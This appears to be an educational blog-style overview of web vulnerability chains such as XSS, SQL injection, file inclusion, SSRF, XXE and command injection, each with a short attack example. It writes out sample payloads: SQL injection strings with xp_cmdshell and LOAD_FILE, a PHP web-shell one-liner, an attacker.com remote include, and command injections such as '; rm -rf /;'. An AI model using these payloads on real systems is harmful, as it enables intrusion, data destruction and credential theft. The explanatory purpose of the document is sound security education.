Common Web Vulnerability Chains with Examples
Table Of Contents
1. Cross-Site Scripting (XSS)
XSS → Session Hijacking → Privilege Escalation Example:
- A comment section on a website is vulnerable to stored XSS.
- An attacker posts a comment containing a malicious script that steals session cookies when viewed by other users.
The script sends the session cookie to the attacker, who then uses it to impersonate the user and escalate privileges.
XSS → CSRF → Account Takeover
Example:
- A web application allows users to update their email without CSRF protection.
- The attacker sends a link with an embedded XSS payload to the victim.
When the victim clicks the link, the XSS payload executes a CSRF attack, changing the victim’s email address.
XSS → LFI/RFI → RCE
Example:
- An attacker finds an XSS vulnerability in a search feature and exploits it to inject a script that exploits an RFI vulnerability.
- The RFI payload points to an external malicious script, which gets executed on the server, leading to RCE.
2. SQL Injection (SQLi)
SQLi → Data Exfiltration → Credential Theft Example:
-An attacker injects OR 1=1 into a login form.
-This bypasses authentication and returns all user records, revealing usernames and hashed passwords.
SQLi → Authentication Bypass → Privilege Escalation Example:
-Injecting ' OR '1'='1 into a login form bypasses authentication.
-The attacker gains access to the application with administrative privileges.
SQLi → RCE Example:
-The application has a vulnerable SQL query that allows executing commands(e.g., xp_cmdshell in SQL Server).
-The attacker injects ; exec xp_cmdshell('dir'); -- to execute commands on the server.
SQLi → LFI Example:
-An attacker exploits SQLi to read a file from the server, such as the application configuration file.
-The query UNION SELECT LOAD_FILE('/etc/passwd') reveals sensitive information, enabling further attacks.
3. Local File Inclusion (LFI)
LFI → Information Disclosure → Credential Theft Example:
- An attacker exploits LFI to read
/etc/passwdand/var/www/html/config.php. This reveals database credentials stored in the configuration file.
LFI → RCE
Example:
- LFI is used to include
/proc/self/environor logs containing PHP code injected by the attacker. - The attacker injects
<?php system($_GET['cmd']); ?>into the logs and includes the log file to achieve RCE.
4. Remote File Inclusion (RFI)
RFI → Web Shell Upload → Persistent Backdoor Example:
- An attacker includes a remote script that uploads a PHP web shell to the server.
The attacker accesses the web shell at
http://example.com/shell.php, maintaining persistent control.RFI → RCE
Example:An RFI vulnerability allows including
http://attacker.com/shell.php.- The included script contains malicious code that executes commands on the server.
5. Cross-Site Request Forgery (CSRF)
CSRF → Account Takeover → Business Logic Abuse Example:
- The attacker crafts a malicious form that changes the user’s password.
When the victim submits the form, their password is changed without their knowledge.
CSRF → XSS Injection
Example:
- The attacker crafts a malicious form that injects a script into the user's profile.
- When the victim submits the form, the script is stored and executed whenever the profile is viewed.
6. Command Injection
Command Injection → RCE Example:
A web application passes user input to a system shell without sanitization.
The attacker injects ; rm -rf /; into the input field, causing arbitrary
commands to be executed.
Command Injection → Data Exfiltration Example:
An attacker injects ; cat /etc/passwd; into a vulnerable input field.
The command reveals sensitive information that the attacker can exfiltrate.
7. Server-Side Request Forgery (SSRF)
SSRF → Internal Network Scanning → Pivoting Example:
- An SSRF vulnerability allows the attacker to send requests to internal IP addresses.
The attacker discovers internal services and exploits them to pivot deeper into the network.
SSRF → Metadata Service Access → Cloud Account Takeover
Example:Exploiting SSRF to access the cloud provider's metadata service.
- The attacker retrieves IAM credentials, gaining control over the cloud account.
8. Insecure Deserialization
Insecure Deserialization → RCE Example:
- The application deserializes untrusted data.
The attacker crafts a serialized payload that executes arbitrary code upon deserialization.
Insecure Deserialization → Authentication Bypass
Example:The attacker manipulates a serialized object to escalate their privileges.
- Upon deserialization, the attacker gains administrative access.
9. XML External Entity (XXE)
XXE → File Disclosure → Credential Theft Example:
- An XXE payload in an XML file retrieves
/etc/passwd. The attacker uses this information to further compromise the system.
XXE → SSRF
Example:An XXE payload makes internal HTTP requests.
The attacker discovers internal services and potentially exploits them.
XXE → Denial of Service (DoS)
Example:An XXE payload triggers a billion laughs attack, consuming server resources and causing a DoS.
10. Clickjacking
Clickjacking → CSRF → Account Takeover Example:
- The attacker overlays a transparent iframe over a legitimate website.
The victim unknowingly clicks on buttons that trigger CSRF attacks.
Clickjacking → XSS Injection
Example:The attacker uses clickjacking to trick the victim into clicking on elements that inject XSS payloads.
11. Self-XSS
Self-XSS → Credential Theft Example:
- The attacker convinces the victim to paste a malicious script into their browser console.
The script sends the victim's session cookies to the attacker.
Self-XSS → Account Takeover
Example:The victim runs a script that changes their account settings.
- The attacker gains control over the victim's account by changing the email address and password.
